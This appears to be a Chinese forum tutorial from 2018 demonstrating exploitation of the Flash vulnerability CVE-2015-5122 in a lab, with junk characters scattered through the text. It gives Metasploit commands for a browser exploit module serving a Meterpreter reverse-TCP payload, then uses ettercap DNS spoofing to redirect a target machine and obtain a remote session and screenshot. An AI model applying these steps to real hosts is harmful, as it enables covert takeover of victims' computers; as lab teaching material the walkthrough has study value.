cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

9 M8 `' A$ k" ]3 O' ? 二、cve2015-5122漏洞实例演示虚拟机 * M6 K' X7 E- A& [5 }

! g, f9 m, @( u7 L! A% ]/ O 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： / G* R5 q$ g( {

) l H5 p+ B6 h9 Q search cve-2015-5122如图： ! q! A! Y( k6 n# i7 p

: Q* y9 B7 f' Q; h m- y+ H $ D# _+ n& e% ?6 U7 o1 z

, I9 W; F/ c. n1 K! L1 S' M 下面我们敲如下命令： / i. Z9 i# \9 M$ T

" Q# i7 Z$ A0 ?8 c! \2 a3 b3 { use exploit/multi/browser/adobe_flash_opaque_background_uaf 8 @% @1 Y0 P) H4 ~8 Q @

& _; A( W ?6 L3 \5 S/ p4 }+ @: k set PAYLOAD windows/meterpreter/reverse_tcp 6 d; k& r7 F4 n p( e/ M& q

& i- H: R. \# z8 ?, v6 E set LHOST 192.168.0.109 ' [* K0 u, \$ {1 B

' ~# n, G5 ~+ m set URIPATH / /*根目录*/ ! g" ?+ _9 e& _2 c" p J

7 Q7 E; w1 r" I0 f2 C2 c set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 + B5 ~) s! q( a: j$ E

5 Z& A$ Y+ ]$ o) `% H set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 # W) i% Y! o: T$ {9 d) u

& W- i' v6 a7 e3 B1 A: u6 C; g0 X5 R% P 然后show options如图： , C; n! \( N# O$ X9 E' W/ f( N" [$ K8 Q

' n" u( E) A8 ?2 {0 y6 ~- `' X 8 X. }4 c& i( K# x

+ h0 m) Q- `4 G5 g) s0 j 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
2 k8 ^9 I/ c; \( ]/ ~1 W+ g ; s, p& p5 t; A: {$ ^3 l' W& \: k

" S- k; M8 p5 I) R& @0 ] 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 6 I5 j0 s. T: A1 p

4 M. I, l5 |6 A, ^ N Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 0 u. o: z7 g+ N7 a: S

8 ^- v; v! V( c( a5 t' v6 x 1 F9 W9 m, z- |3 q. Y- y/ R! j

# J! i9 D0 b, c5 j1 _/ [ 成功了，这时候我们断开ettercap，如图： 9 ^) J& ~/ @9 n0 e

2 m! L+ F/ s1 s2 P2 r/ K/ e 4 }0 s f* f4 _

% r- G X0 |; @% N! t, I Screenshot如图： 4 J2 O) l; J+ `- j/ h7 k6 O

' U. T; f6 Y6 p' R: W ( E) F1 J% ~& R

8 f3 \8 ?. U% n ) Z% m! J( P. I

		自动登录	找回密码
密码			立即注册